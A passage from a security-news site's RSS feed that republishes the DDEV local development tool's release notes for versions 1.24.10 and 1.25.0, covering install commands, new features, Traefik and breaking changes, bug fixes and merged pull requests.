<li>macOS: <code>brew install ddev/ddev/ddev</code> or just <code>brew upgrade ddev</code>.</li>
<li>Linux: Use <code>sudo apt-get update &amp;&amp; sudo apt-get install ddev</code>, see <a href="https://docs.ddev.com/en/stable/users/install/ddev-installation/#linux" rel="nofollow">apt/yum installation</a></li>
<li>Windows and WSL2: Download the <a href="https://github.com/ddev/ddev/releases/download/v1.24.10/ddev_windows_amd64_installer.v1.24.10.exe">ddev_windows_amd64_installer.v1.24.10.exe</a>; you can run it for install or upgrade.</li>
<li>Consider <code>ddev delete images</code> or <code>ddev delete images --all</code> after upgrading to free up disk space used by previous Docker image versions. This does no harm.</li>
<li>Consider <code>ddev config --auto</code> to update your projects to current configuration.</li>
</ul>
<h2><g-emoji class="g-emoji" alias="warning">⚠️</g-emoji> Docker Compose requires newer Docker Buildx on Linux</h2>
<blockquote>
<p><strong>Error:</strong> <code>compose build requires buildx 0.17 or later</code></p>
</blockquote>
<p>This is caused by <a href="https://github.com/docker/compose/pull/13295" data-hovercard-type="pull_request" data-hovercard-url="/docker/compose/pull/13295/hovercard">upstream change</a>.</p>
<p><strong>Solution:</strong> Upgrade Docker using <a href="https://docs.docker.com/engine/install/" rel="nofollow">https://docs.docker.com/engine/install/</a></p>
<h2>Note</h2>
<p>This is a bugfix release. A regression in v1.24.9 prevented DDEV from updating the <code>/etc/hosts</code> file in CI environments (e.g., GitHub Actions) when using custom project TLDs:</p>
<ul>
<li>v1.24.10 reverts the change "Non-interactive mode now forced in non-tty environments"</li>
</ul>
<h2>Highlights</h2>
<ul>
<li>Support for PHP 8.5.0 RC 3 (note: some extensions are not yet available: apcu, imagick, memcached, redis, uploadprogress, xdebug, xhprof, xmlrpc, yaml)</li>
<li>Support for PostgreSQL 18</li>
<li><a href="https://docs.ddev.com/en/stable/users/usage/managing-projects/#access-another-project-via-https" rel="nofollow">Automatic HTTP/S communication between DDEV projects</a> - no need to manually configure <code>external_links</code></li>
<li><a href="https://docs.ddev.com/en/stable/users/configuration/config/#omit_project_name_by_default" rel="nofollow">Option to omit project names</a> in <code>.ddev/config.yaml</code> by default with <code>ddev config global --omit-project-name-by-default=true</code> - useful when working with multiple Git worktrees</li>
<li>Auto-discovery of <code>PLATFORM_PROJECT</code> and <code>PLATFORM_ENVIRONMENT</code> from existing config for <a href="https://docs.ddev.com/en/stable/users/providers/upsun/#upsun-per-project-configuration" rel="nofollow">Upsun Flex</a> and <a href="https://docs.ddev.com/en/stable/users/providers/platform/#upsun-fixedplatformsh-per-project-configuration" rel="nofollow">Upsun Fixed (Platform.sh)</a> provider integrations</li>
</ul>
<h2>Features</h2>
<ul>
<li>New <a href="https://docs.ddev.com/en/stable/users/usage/commands/#utility-diagnose" rel="nofollow"><code>ddev utility diagnose</code></a> command for quick diagnostics on your DDEV installation and current project</li>
<li>New <a href="https://docs.ddev.com/en/stable/users/usage/commands/#add-on-search" rel="nofollow"><code>ddev add-on search</code></a> command, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AkibaAT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AkibaAT">@AkibaAT</a></li>
<li>New <a href="https://docs.ddev.com/en/stable/users/usage/commands/#xdebug" rel="nofollow"><code>ddev xdebug info</code></a> command to display <code>xdebug_info()</code> output</li>
<li>Customize <a href="https://docs.ddev.com/en/stable/users/usage/commands/#describe" rel="nofollow"><code>ddev describe</code></a> output using the <a href="https://docs.ddev.com/en/stable/users/extend/custom-docker-services/#customizing-ddev-describe-output" rel="nofollow"><code>x-ddev.describe-*</code> extensions</a> - useful for <a href="https://addons.ddev.com/" rel="nofollow">add-ons</a></li>
<li>Change <a href="https://docs.ddev.com/en/stable/users/usage/commands/#ssh" rel="nofollow"><code>ddev ssh</code></a> shell using the <a href="https://docs.ddev.com/en/stable/users/extend/in-container-configuration/#changing-ddev-ssh-shell" rel="nofollow"><code>x-ddev.ssh-shell</code> extension</a> - useful for <a href="https://addons.ddev.com/" rel="nofollow">add-ons</a></li>
<li>New <code>--user</code>/<code>-u</code> flag for <a href="https://docs.ddev.com/en/stable/users/usage/commands/#exec" rel="nofollow"><code>ddev exec</code></a> and <a href="https://docs.ddev.com/en/stable/users/usage/commands/#ssh" rel="nofollow"><code>ddev ssh</code></a></li>
<li><code>exec</code> hooks now <a href="https://docs.ddev.com/en/stable/users/configuration/hooks/#exec-execute-a-shell-command-in-a-container-defaults-to-web-container" rel="nofollow">support the <code>user</code> field</a></li>
<li>New <code>pre-share</code> and <code>post-share</code> <a href="https://docs.ddev.com/en/stable/users/configuration/hooks/" rel="nofollow">hooks</a>. This can help change the required URL for <code>ddev share</code> in CMSs like WordPress and Magento2.</li>
<li>PostgreSQL connection support in <a href="https://docs.ddev.com/en/stable/users/usage/commands/#heidisql" rel="nofollow"><code>ddev heidisql</code></a>, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/raphaelportmann/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/raphaelportmann">@raphaelportmann</a></li>
<li>Show failed container logs on project start by running <code>DDEV_DEBUG=true ddev start</code></li>
<li>Enhanced <a href="https://docs.ddev.com/en/stable/users/configuration/config/#composer_root" rel="nofollow"><code>composer_root</code></a> support for app <a href="https://docs.ddev.com/en/stable/users/configuration/config/#type" rel="nofollow"><code>type</code></a> detection in CakePHP, Craft CMS, Laravel, Magento 2, Shopware 6, and Symfony, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vanWittlaer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vanWittlaer">@vanWittlaer</a> for initial PR for Shopware 6</li>
<li>Silence warnings about custom configuration files in the <code>.ddev</code> directory by adding <code>#ddev-silent-no-warn</code> to the file. <a href="https://docs.ddev.com/en/stable/users/usage/faq/#what-if-i-dont-like-the-settings-files-or-gitignores-ddev-creates" rel="nofollow">Documentation</a></li>
</ul>
<h2>Bug Fixes</h2>
<ul>
<li>PostgreSQL now runs as container user (mirrored from host user) instead of <code>postgres:postgres</code></li>
<li><a href="https://docs.ddev.com/en/stable/users/usage/commands/#describe" rel="nofollow"><code>ddev describe</code></a> now works with stopped or broken containers</li>
<li>Improved support for <code>DDEV_*</code> environment variables in PHP-based add-ons</li>
<li><code>APP_DEFAULT_LOCALE</code> is no longer overridden in CakePHP, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tyler36/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tyler36">@tyler36</a></li>
<li>Removed hardcoded <code>--server-id=0</code> parameter from MySQL/MariaDB startup, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cyppe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cyppe">@cyppe</a></li>
<li>Fixed <code>docker-compose</code> warnings on <code>ddev start</code> when project root <code>.env</code> file contains dollar signs</li>
<li><a href="https://docs.ddev.com/en/stable/users/usage/commands/#add-on-get" rel="nofollow"><code>ddev add-on get</code></a> now retries without authentication on invalid GitHub token</li>
<li>Debug and verbose output now suppressed when using <code>--json-output</code>/<code>-j</code> flag</li>
<li>Improved container username sanitization with better fallback handling</li>
<li>Fixed <code>blackfire-php</code> installation for older PHP versions</li>
<li>Fixed bug with broken label in Mutagen volume when path to Docker socket is too long</li>
<li>Fixed intermittent hang in <code>ddev auth ssh</code> when SSH key is password-protected</li>
<li>Fixed hang in <code>ddev start</code> on macOS when temp directory permissions are broken after macOS upgrade (fixed in <code>docker-compose</code>)</li>
</ul>
<h2>Internal Improvements</h2>
<ul>
<li>PHP 8.1 no longer preinstalled in <a href="https://hub.docker.com/r/ddev/ddev-webserver" rel="nofollow">ddev/ddev-webserver</a> to reduce image size</li>
<li>Native ARM builder now used for building DDEV Docker images, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AkibaAT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AkibaAT">@AkibaAT</a></li>
<li><a href="https://docs.ddev.com/en/stable/users/usage/commands/#utility" rel="nofollow"><code>ddev utility</code></a> is now the primary command (<code>ddev debug</code> moved to alias)</li>
<li>Healthcheck added to <a href="https://hub.docker.com/r/ddev/ddev-xhgui" rel="nofollow">ddev/ddev-xhgui</a> image</li>
<li>Linux tests now run separately instead of in matrix, allowing single test restarts on failure</li>
<li>Improved support for <code>CI=true</code> in GitHub Actions</li>
<li>Vite setup documentation migrated into <a href="https://docs.ddev.com/en/stable/users/usage/vite/" rel="nofollow">DDEV docs</a>, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mandrasch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mandrasch">@mandrasch</a> for continuous support on the <a href="https://ddev.com/blog/working-with-vite-in-ddev/" rel="nofollow">blog article</a></li>
<li>Improved <a href="https://docs.ddev.com/en/stable/users/quickstart/" rel="nofollow">quickstarts</a> code block formatting to resolve copy/paste issues in some terminals</li>
<li>Added <code>docker-buildx</code> dependency for <a href="https://aur.archlinux.org/packages/ddev-bin" rel="nofollow">AUR</a> installation</li>
<li>Internet detection now uses <code>one.one.one.one</code> instead of <code>test.ddev.site</code></li>
<li>Replaced <code>GITHUB_OWNER</code> with <code>DDEV_GITHUB_OWNER</code> in <a href="https://ddev.com/install.sh" rel="nofollow">https://ddev.com/install.sh</a></li>
<li>Switched to lightweight <a href="https://mcr.microsoft.com/en-us/artifact/mar/devcontainers/base/about" rel="nofollow">debian-12</a> image for GitHub Codespaces</li>
<li>Removed Gitpod configuration (service is <a href="https://ona.com/stories/gitpod-classic-payg-sunset" rel="nofollow">no longer available</a>)</li>
</ul>
<h2>Minor Updates</h2>
<ul>
<li>PHP 8.3.27, 8.4.14, and 8.5.0 RC 3</li>
<li>Docker Compose v2.40.3</li>
<li>Updated <a href="https://docs.ddev.com/en/stable/users/quickstart/#moodle" rel="nofollow">quickstart</a> for <a href="https://moodledev.io/general/releases/5.1" rel="nofollow">Moodle 5.1</a></li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>fix: make install_ddev_head.sh install all binaries [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3586714417" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7794" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7794/hovercard" href="https://github.com/ddev/ddev/pull/7794">#7794</a></li>
<li>fix: write download result to stderr for docker-compose and mutagen [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3586644903" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7792" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7792/hovercard" href="https://github.com/ddev/ddev/pull/7792">#7792</a></li>
<li>fix: don't assume non-interactive mode for CI=true or non-tty, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3586059715" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7790" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7790/hovercard" href="https://github.com/ddev/ddev/issues/7790">#7790</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3586592309" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7791" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7791/hovercard" href="https://github.com/ddev/ddev/pull/7791">#7791</a></li>
<li>build(docker): bump images to v1.24.10 for release by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3586657732" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7793" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7793/hovercard" href="https://github.com/ddev/ddev/pull/7793">#7793</a></li>
<li>build: add mkcert to artifacts, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3586714417" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7794" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7794/hovercard" href="https://github.com/ddev/ddev/pull/7794">#7794</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3587421369" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7796" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7796/hovercard" href="https://github.com/ddev/ddev/pull/7796">#7796</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/ddev/ddev/compare/v1.24.9...v1.24.10"><tt>v1.24.9...v1.24.10</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v1.25.0]]></title>
<description><![CDATA[Installation
See the installation instructions for details, but it's easy:

macOS: brew install ddev/ddev/ddev or just brew upgrade ddev.
Linux: Use sudo apt-get update && sudo apt-get install ddev, see apt/yum installation
Windows and WSL2: Download the Windows Installer; you can run it for inst...]]></description>
<link>https://tsecurity.de/de/3497297/downloads/v1250/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3497297/downloads/v1250/</guid>
<pubDate>Thu, 07 May 2026 22:17:20 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Installation</h2>
<p>See the <a href="https://docs.ddev.com/en/stable/users/install/ddev-installation/" rel="nofollow">installation instructions</a> for details, but it's easy:</p>
<ul>
<li>macOS: <code>brew install ddev/ddev/ddev</code> or just <code>brew upgrade ddev</code>.</li>
<li>Linux: Use <code>sudo apt-get update &amp;&amp; sudo apt-get install ddev</code>, see <a href="https://docs.ddev.com/en/stable/users/install/ddev-installation/#linux" rel="nofollow">apt/yum installation</a></li>
<li>Windows and WSL2: Download the <a href="https://ddev.com/download/" rel="nofollow">Windows Installer</a>; you can run it for install or upgrade. <code>winget install --interactive ddev</code> works too.<br>
<g-emoji class="g-emoji" alias="warning">⚠️</g-emoji> <strong>Traditional Windows users (not WSL2)</strong>: If needed, the installer will prompt you to uninstall the previous system-wide installation to avoid conflicts with the new per-user installation.</li>
<li>Consider <code>ddev delete images</code> or <code>ddev delete images --all</code> after upgrading to free up disk space used by previous Docker image versions. This does no harm.</li>
<li>Consider <code>ddev config --auto</code> to update your projects to current configuration.</li>
</ul>
<h2>Highlights</h2>
<h3>New defaults</h3>
<ul>
<li>Debian <strong>Trixie</strong> is now the base image for <code>ddev-webserver</code> and <code>ddev-ssh-agent</code> (replacing Debian Bookworm). See <a href="https://www.debian.org/releases/trixie/release-notes/issues.html" rel="nofollow">Issues to be aware of for Trixie</a>.<br>
(Some projects with complex Dockerfiles or obsolete <code>webimage_extra_packages</code> may need to be updated.)</li>
<li><a href="https://ddev.com/blog/xhgui-feature/" rel="nofollow"><strong>XHGui</strong></a> is now the default profiler (prepend mode remains available via <code>ddev config global --xhprof-mode=prepend</code>).</li>
<li><strong>Node.js v24</strong> is default in new projects (replacing Node.js v22)</li>
<li><strong>PHP 8.4</strong> is default in new projects (replacing PHP 8.3)</li>
<li><strong>MariaDB 11.8</strong> is default in new projects (replacing MariaDB 10.11)</li>
</ul>
<h3>Additional highlights</h3>
<ul>
<li>Completely revised <strong><a href="https://ddev.com/download/" rel="nofollow">Windows installer</a></strong> now uses <strong>per-user installation</strong> for WSL2 or traditional Windows (no admin account required)</li>
<li>Reworked configurable <code>ddev share</code> command with a new <strong>cloudflared</strong> share provider, see <a href="https://docs.ddev.com/en/stable/users/topics/sharing/" rel="nofollow">new docs</a> and <a href="https://ddev.com/blog/share-providers/" rel="nofollow">blog</a></li>
<li>Add <code>ddev utility xdebug-diagnose</code> command, see <a href="https://ddev.com/blog/xdebug-step-debugging-understanding-and-troubleshooting/" rel="nofollow">Xdebug in DDEV: Understanding, Debugging, and Troubleshooting Step Debugging</a></li>
<li>Add <code>ddev utility mutagen-diagnose</code> command, see <a href="https://ddev.com/blog/mutagen-functionality-issues-debugging/" rel="nofollow">Mutagen in DDEV: Functionality, Issues, and Debugging</a></li>
<li><code>ddev pantheon pull</code> got new <code>DDEV_PANTHEON_SITE</code>, <code>DDEV_PANTHEON_ENVIRONMENT</code>, <code>DDEV_USE_PANTHEON_BACKUP</code> variables, see updated <a href="https://docs.ddev.com/en/stable/users/providers/pantheon/" rel="nofollow">Pantheon Integration</a></li>
<li><code>ddev snapshot</code> now uses <strong>zstd</strong> instead of gzip for significantly faster exports and restores, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/deviantintegral/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/deviantintegral">@deviantintegral</a></li>
<li>Add <a href="https://docs.ddev.com/en/stable/users/quickstart/#codeigniter" rel="nofollow">CodeIgniter</a> project type, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Franky5831/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Franky5831">@Franky5831</a></li>
<li>Experimental support for <strong>Podman</strong> and <strong>Docker Rootless</strong>, see <a href="https://ddev.com/blog/podman-and-docker-rootless/" rel="nofollow">Podman and Docker Rootless in DDEV</a></li>
<li><a href="https://github.com/ddev/ddev-frankenphp"><code>ddev-frankenphp</code></a> is an official add-on with many improvements, see updated <a href="https://ddev.com/blog/using-frankenphp-with-ddev/" rel="nofollow">Using FrankenPHP with DDEV</a></li>
</ul>
<h2>Features</h2>
<ul>
<li>New <a href="https://docs.ddev.com/en/stable/users/quickstart/#wagtail-python-generic" rel="nofollow">Wagtail (Python, Generic)</a> quickstart</li>
<li>Added Drupal 12 project type (development branch). Drupal 12 has not yet been released, but it's showing up in developer builds already.</li>
<li>New <code>--no-cache</code> flag for <code>ddev start</code> and <code>ddev restart</code> (as an alternative to <code>ddev utility rebuild</code>)</li>
<li>Improved support for non-Codespaces devcontainers</li>
<li>Refactored <code>ddev add-on</code> subcommands with a fallback mechanism to avoid GitHub API rate limits</li>
<li>Much faster <code>ddev add-on list</code> and <code>ddev add-on search</code></li>
<li>Shell autocompletion for <code>ddev add-on get &lt;TAB&gt;</code></li>
<li>SELinux enviroment detection (auto <a href="https://docs.docker.com/engine/storage/bind-mounts/#configure-the-selinux-label" rel="nofollow">SELinux label</a> for bind mounts)</li>
<li>Support for additional SSH config files (<code>*.conf</code>) in <code>.ddev/homeadditions/.ssh/config.d</code> (global or project-level), see <a href="https://docs.ddev.com/en/stable/users/extend/in-container-configuration/#ssh-configuration" rel="nofollow">SSH confugation</a>, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codebymikey/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codebymikey">@codebymikey</a></li>
<li>More portable database collations. Databases imported and exported from newer MySQL and MariaDB are less likely to have problems with proprietary collations like <code>utf8mb4_0900_ai_ci</code> and <code>utf8mb4_uca1400_ai_ci</code> as they use more traditional collations in DDEV.</li>
<li>DBeaver support for traditional Windows, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ddubau/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ddubau">@ddubau</a></li>
</ul>
<h2>Traefik Router Features, Fixes, and Breaking Changes</h2>
<ul>
<li>Project Traefik configuration is now standardized to a single file: <code>.ddev/traefik/config/&lt;projectname&gt;.yaml</code> (all other files are ignored). See <a href="https://github.com/ddev/ddev/issues/8047" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8047/hovercard">issue #8047</a>.</li>
<li>Add any global Traefik configuration inside the <code>$HOME/.ddev/traefik/custom-global-config/</code> directory</li>
<li>Removed <code>defaultRuleSyntax: v2</code> and <code>ruleSyntax: v3</code> from Traefik configs. Traefik v3 syntax is now used by default.</li>
<li>Traefik configuration errors now show warnings instead of failing hard</li>
<li>Improved Traefik health checks for more reliable router verification</li>
<li>Prevent unnecessary router recreation when bound ports are unchanged</li>
<li><code>ddev-router</code> is no longer stopped automatically when the last project is stopped, use <code>ddev poweroff</code> to fully stop the router</li>
<li>Traefik monitoring port is now bound to localhost only, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JUVOJustin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JUVOJustin">@JUVOJustin</a></li>
<li>Paused or stopped projects are excluded from Traefik configuration</li>
<li>Bypass router port checks when all ports appear busy (for example, when endpoint security software intercepts localhost traffic)</li>
</ul>
<h2>Breaking Changes / Removals</h2>
<ul>
<li>Default <code>xhprof_mode</code> changed from "prepend" to "xhgui" but you can easily change it back</li>
<li>Removed <code>ddev utility capabilities</code>, use <a href="https://docs.ddev.com/en/stable/users/configuration/config/#ddev_version_constraint" rel="nofollow"><code>ddev_version_constraint</code></a> instead in add-ons.</li>
<li>Removed NFS support, use <a href="https://docs.ddev.com/en/stable/users/install/performance/#filesystem-performance-mutagen" rel="nofollow">Mutagen</a></li>
<li>Removed <code>ddev service</code>, custom services can be installed/uninstalled via <a href="https://docs.ddev.com/en/stable/users/usage/commands/#add-on" rel="nofollow"><code>ddev add-on</code></a></li>
<li>Removed <code>ddev nvm</code>, install the <a href="https://github.com/ddev/ddev-nvm"><code>ddev-nvm</code></a> add-on if needed</li>
<li>Removed obsolete or non-functional commands and command aliases:
<ul>
<li><code>ddev restore-snapshot</code></li>
<li><code>ddev auth pantheon</code></li>
<li><code>ddev config pantheon</code></li>
</ul>
</li>
<li>Removed obsolete <code>ddev config</code> flags:
<ul>
<li><code>--mutagen-enabled</code> (use <code>--performance-mode=mutagen</code>)</li>
<li><code>--upload-dir</code> (use <code>--upload-dirs</code>)</li>
<li><code>--db-image</code>, <code>--db-image-default</code> (never documented or used)</li>
</ul>
</li>
<li>Removed deprecated <code>ddev config</code> flag aliases:
<ul>
<li><code>--http-port</code> → <code>--router-http-port</code></li>
<li><code>--https-port</code> → <code>--router-https-port</code></li>
<li><code>--mailhog-port</code> → <code>--mailpit-http-port</code></li>
<li><code>--mailhog-https-port</code> → <code>--mailpit-https-port</code></li>
<li><code>--projectname</code> → <code>--project-name</code></li>
<li><code>--projecttype</code>, <code>--apptype</code> → <code>--project-type</code></li>
<li><code>--sitename</code> → <code>--project-name</code></li>
<li><code>--image-defaults</code> → <code>--web-image-default</code></li>
</ul>
</li>
<li>Removed <code>nginx.org</code> repository from <code>ddev-webserver</code>, now using nginx from the Debian Trixie repository</li>
<li>Migrated all APT repositories in <code>ddev-webserver</code> from legacy <code>*.list</code> files to <code>*.sources</code> (deb822) format</li>
</ul>
<h2>Bug Fixes</h2>
<ul>
<li>Fixed <code>ddev heidisql</code> support for multiple databases</li>
<li>Fixed PostgreSQL builds when overriding the database username</li>
<li>Fixed Windows installer behavior on non-English Windows locales</li>
<li>Improved Bash detection for non-admin Windows installations</li>
<li>Fixed <code>host.docker.internal</code> IP detection for WSL2 mirrored mode with virtual adapters present</li>
<li>Fixed conflicts between <code>HostWorkingDir</code> and <code>WebWorkingDir</code> affecting <code>ddev npm</code>, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/crowjake/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/crowjake">@crowjake</a></li>
<li>Fixed support for <code>PKCS#8</code> keys in <code>ddev auth ssh</code></li>
<li>Fixed <code>ddev snapshot</code> command for <code>postgres:9</code></li>
<li>Create Docker volumes only for the configured database type</li>
<li>Fixed <code>ddev xdebug</code>, <code>ddev xhprof</code>, and <code>ddev blackfire</code> handlers for the <a href="https://github.com/ddev/ddev-frankenphp">ddev-frankenphp</a> add-on</li>
<li>Fixed <code>ddev snapshot</code> failure when run immediately after <code>ddev snapshot restore</code></li>
<li>Always show the correct project name in <code>ddev mutagen st</code>, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/agviu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/agviu">@agviu</a></li>
<li>Warn about non-persistent changes when using <code>ddev composer self-update</code> and <code>ddev composer global</code></li>
<li>Added support for <code>COMPOSER_NO_SECURITY_BLOCKING=1</code> in <code>ddev composer</code></li>
<li>Run <code>post-create-project-cmd</code> for plugin events in <code>ddev composer create-project</code></li>
<li>Improved <code>log-stderr.sh</code> reporting during <code>ddev start</code></li>
<li>Skip poweroff prompts when containers are already stopped during version upgrades</li>
<li>Fixed database port type in TYPO3 settings, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BreathCodeFlow/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BreathCodeFlow">@BreathCodeFlow</a></li>
<li>Detect and warn about multiple global config directories during <code>ddev start</code></li>
</ul>
<h2>Minor Updates</h2>
<ul>
<li>PHP 8.3.30, 8.4.17, and 8.5.2</li>
<li>Docker Compose v5.0.2</li>
<li>Updated <a href="https://docs.ddev.com/en/stable/users/quickstart/#generic" rel="nofollow">Generic</a> webserver quickstart</li>
<li>Add <code>APP_FULL_BASE_URL</code> for CakePHP, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ajibarra/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ajibarra">@ajibarra</a></li>
<li>Updated Lagoon provider instructions with sync configuration, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/froboy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/froboy">@froboy</a></li>
<li>Added Cloudflare WARP networking instructions, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lguigo22/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lguigo22">@lguigo22</a></li>
<li>Updated Ibexa DXP installation steps, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/adriendupuis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/adriendupuis">@adriendupuis</a></li>
<li>Added troubleshooting guidance for endpoint security interfering with Xdebug, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joelpittet/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joelpittet">@joelpittet</a></li>
<li>Replaced <code>github.com/docker/docker</code> with <code>github.com/moby/moby/client</code> and <code>github.com/moby/moby/api</code></li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>test: Allow overriding ignore expiring keys [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3595807650" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7803" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7803/hovercard" href="https://github.com/ddev/ddev/pull/7803">#7803</a></li>
<li>test: Improve TestHasConfigNameOverride so it doesn't leave projects after completion, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3588095046" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7797" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7797/hovercard" href="https://github.com/ddev/ddev/issues/7797">#7797</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3594876628" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7798" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7798/hovercard" href="https://github.com/ddev/ddev/pull/7798">#7798</a></li>
